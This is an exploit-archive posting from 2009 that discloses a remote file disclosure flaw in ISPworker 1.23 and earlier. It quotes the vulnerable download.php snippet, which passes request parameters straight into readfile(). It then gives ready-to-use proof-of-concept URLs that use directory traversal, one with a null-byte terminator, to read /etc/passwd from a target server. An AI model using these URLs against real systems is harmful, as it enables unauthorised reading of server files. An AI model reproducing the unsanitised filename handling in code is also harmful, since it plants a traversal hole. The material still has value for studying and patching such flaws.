Home / exploits ispworker123-disclose.txt
Posted on 01 December 2009
[ Discovered by cr4wl3r cr4wl3r[4t]linuxmail[dot]org ] ######################################################################## #ISPworker <= 1.23 Remote File Disclosure exploit #Download Script : http://www.ispware.de/_files/ispworker-1.23.tar.gz #Dork : die("lamers attempt"); :P ######################################################################## # #Vuln : ./ispworker-1.23/files/ispworker/module/ticket/download.php # # <?header('Content-type: '.$_REQUEST[type]); # header('Content-Disposition: attachment; filename="'.$_REQUEST[filename].'"'); # readfile("./tmp/$ticketid"."_".$_REQUEST[filename]); # ?> # #PoC : http://[target]/[path]/module/ticket/download.php?ticketid=../../../../../../../../../etc/passwd%00 # http://[target]/[path]/module/ticket/download.php?filename=../../../../../../../../../etc/passwd # ######################################################################## ######################################################################## ####################[90r0nt4l0 und3r9r0nd c0mmun1ty]#################### ######################################################################## ######################################################################## [ Gorontalo / 2009 ]
